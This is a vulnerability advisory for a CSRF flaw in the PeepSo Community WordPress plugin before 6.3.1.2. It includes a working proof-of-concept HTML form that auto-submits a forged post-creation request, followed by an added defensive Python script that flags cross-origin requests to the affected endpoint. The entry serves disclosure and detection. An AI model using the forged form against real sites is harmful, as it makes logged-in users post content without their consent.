wpexploit | Bikram Kharal | WPEX-ID: CAC12B64-ED25-4EE2-933F-8FF722605271
History: Jan 09, 2024 - 12:00 a.m.

Community by PeepSo < 6.3.1.2 - User Post Creation via CSRF

Tags: peepso community, user post creation, csrf, html form, security exploit, cross-site request forgery

AI Score: 6.8 Medium (Confidence: Low)
EPSS: 0.0005 Low (Percentile: 17.1%)

Description

The plugin does not perform a CSRF check when creating a user post (visible on the user's wall on their profile page), which could allow attackers to make logged-in users perform this action via a CSRF attack.

1. Log in as a normal user.
2. Save the content below as an HTML file.

<html>
  <body>
    <form action="https://example.com/peepsoajax/postbox.post" method="POST">
      <input type="hidden" name="content" value="testing by bikram
" />
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="uid" value="2" />
      <input type="hidden" name="acc" value="10" />
      <input type="hidden" name="type" value="activity" />
      <input type="hidden" name="mood" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

3. Change the id and uid values to your account ID.
4. Open the above HTML file and submit it. A new post will be created and can be seen on the profile page (default /profile/).
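
An added example (not part of the original entry or of PeepSo's code): a log-triage check that classifies requests to the endpoint used in the form above by their Origin/Referer headers, which is how a forged submission differs from one made on the site itself. The request records, the site_origin value and the function names are assumptions made for illustration; it relies on browsers sending "Origin: null" for a form submitted from a local file.

```python
from urllib.parse import urlsplit

TARGET_PATH = "/peepsoajax/postbox.post"  # path from the form action above


def claimed_origin(headers):
    """Origin the browser reports for the request: Origin first, else Referer."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    value = h.get("origin") or h.get("referer")
    if not value:
        return None                      # neither header present
    if value.lower() == "null":
        return "null"                    # opaque origin, e.g. a local HTML file
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return "null"                    # unparseable value: treat as opaque
    return f"{parts.scheme}://{parts.netloc}".lower()


def classify(request, site_origin):
    """Return 'ignore', 'same-origin', 'cross-origin' or 'no-origin'."""
    path = urlsplit(request["path"]).path
    if request["method"].upper() != "POST" or path != TARGET_PATH:
        return "ignore"                  # not the post-creation endpoint
    origin = claimed_origin(request["headers"])
    if origin is None:
        return "no-origin"               # cannot tell; review manually
    return "same-origin" if origin == site_origin.lower() else "cross-origin"


# Constructed sample requests (not captured traffic).
SAMPLE = [
    {"method": "POST", "path": TARGET_PATH,
     "headers": {"Origin": "https://example.com",
                 "Referer": "https://example.com/profile/"}},
    {"method": "POST", "path": TARGET_PATH, "headers": {"Origin": "null"}},
    {"method": "POST", "path": TARGET_PATH,
     "headers": {"Referer": "https://other.example/page.html"}},
    {"method": "POST", "path": TARGET_PATH, "headers": {}},
    {"method": "GET", "path": "/profile/", "headers": {}},
]


def review(requests, site_origin="https://example.com"):
    """Classify each request record against the site's own origin."""
    return [classify(r, site_origin) for r in requests]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLE, review(SAMPLE)):
        print(f"{verdict:12} {req['method']} {req['path']} {req['headers']}")
```

Requests classified as cross-origin or no-origin against this endpoint are the ones worth reviewing on sites still running a version below 6.3.1.2.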
